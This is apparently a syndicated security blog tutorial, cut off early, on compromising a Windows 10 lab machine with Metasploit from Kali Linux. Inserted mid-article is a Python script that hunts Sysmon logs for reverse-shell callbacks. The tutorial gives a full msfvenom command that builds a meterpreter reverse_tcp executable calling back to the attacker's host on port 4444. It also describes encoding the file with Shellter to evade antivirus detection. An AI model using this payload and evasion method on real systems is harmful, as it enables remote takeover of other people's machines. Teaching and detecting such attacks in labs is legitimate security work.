How to Attack Windows 10 Machine with Metasploit on Kali Linux

Introduction

The Metasploit Framework is the most commonly used framework for hackers worldwide. It allows hackers to set up listeners that provide an environment (referred to as a Meterpreter) for manipulating compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. We shall do this through a malicious executable file produced with Shellter.

This article assumes that Kali Linux has already been installed and is reachable from a Windows machine on VirtualBox through a bridged network connection.

Creating a Malicious .exe File

To create the executable, you would use msfvenom as shown in the command below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

The command above instructs msfvenom to generate a 32-bit Windows executable whose payload opens a reverse TCP connection back to us. The output format must be specified as .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port on which we listen for the connection from the target once it has been compromised.
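From the defender's side, the tell-tale artifact of such a payload is the outbound callback to LHOST:LPORT. The following Python is an added example (not part of the original article) that hunts for that callback in Sysmon Event ID 3 network-connection records; the log lines, paths, user names and addresses are constructed for the example, and the allow-listed ports and "user-writable directory" heuristic are assumptions a real deployment would tune.

```python
import re

# Constructed sample Sysmon Event ID 3 (network connection) records, flattened to
# key=value pairs. They are made up for this example, not captured from a real host.
SAMPLE_EVENTS = [
    "EventID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe User=LAB\\alice Initiated=true DestinationIp=142.250.74.46 DestinationPort=443",
    "EventID=3 Image=C:\\Users\\alice\\Downloads\\something32.exe User=LAB\\alice Initiated=true DestinationIp=192.168.100.4 DestinationPort=4444",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\SYSTEM Initiated=true DestinationIp=192.168.100.1 DestinationPort=53",
    "EventID=3 Image=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe User=LAB\\alice Initiated=false DestinationIp=10.0.0.9 DestinationPort=4444",
    "EventID=3 Image=C:\\Users\\alice\\Downloads\\invoice.exe User=LAB\\alice Initiated=true DestinationIp=203.0.113.7 DestinationPort=443",
]

# key=value pairs; values may contain spaces (e.g. "NT AUTHORITY\SYSTEM"), so a value
# runs until the next " key=" token or the end of the line.
KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# Ports where outbound traffic from arbitrary binaries is routine. LPORT is attacker
# chosen (443 works just as well as 4444), so the port is a weak signal on its own.
COMMON_PORTS = {53, 80, 443}

# Directories a standard user can write to; a dropped payload such as something32.exe
# typically runs from one of these rather than from Program Files or System32.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")

def parse_event(line):
    """Turn one flattened Sysmon key=value line into a dict."""
    return dict(KV.findall(line))

def suspicious_callbacks(lines):
    """Return (image, 'ip:port', reasons) for outbound connections worth a look."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        # A reverse_tcp stager dials out; inbound connections are a different hunt.
        if ev.get("EventID") != "3" or ev.get("Initiated") != "true":
            continue
        image, port = ev["Image"], int(ev["DestinationPort"])
        reasons = []
        if image.lower().startswith(USER_WRITABLE):
            reasons.append("binary runs from a user-writable directory")
        if port not in COMMON_PORTS:
            reasons.append(f"non-standard destination port {port}")
        if reasons:
            hits.append((image, f"{ev['DestinationIp']}:{port}", reasons))
    return hits

if __name__ == "__main__":
    for image, dest, reasons in suspicious_callbacks(SAMPLE_EVENTS):
        print(f"{image} -> {dest}: {'; '.join(reasons)}")
```

The hits are hunting leads, not verdicts: a legitimate installer in Downloads trips the path heuristic too, so the output is meant to be triaged against process creation and file write events for the same image.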

To obtain our IP address, we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet), as shown below.

The screenshot below shows the output of the command on successful .exe generation.

Antivirus solutions work by detecting known malicious signatures within executables. Our file will thus be flagged as malicious as soon as it lands in the Windows environment. We therefore have to find a way to modify it so that it evades antivirus detection. We will encode it to make it fully undetectable, or FUD.

To encode our executable, we shall be using Shellter. Shellter works (Read more...)

*** This is a Security Bloggers Network syndicated blog from InfoSec Resources authored by Lester Obbayi. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/jJAVaM3o0go/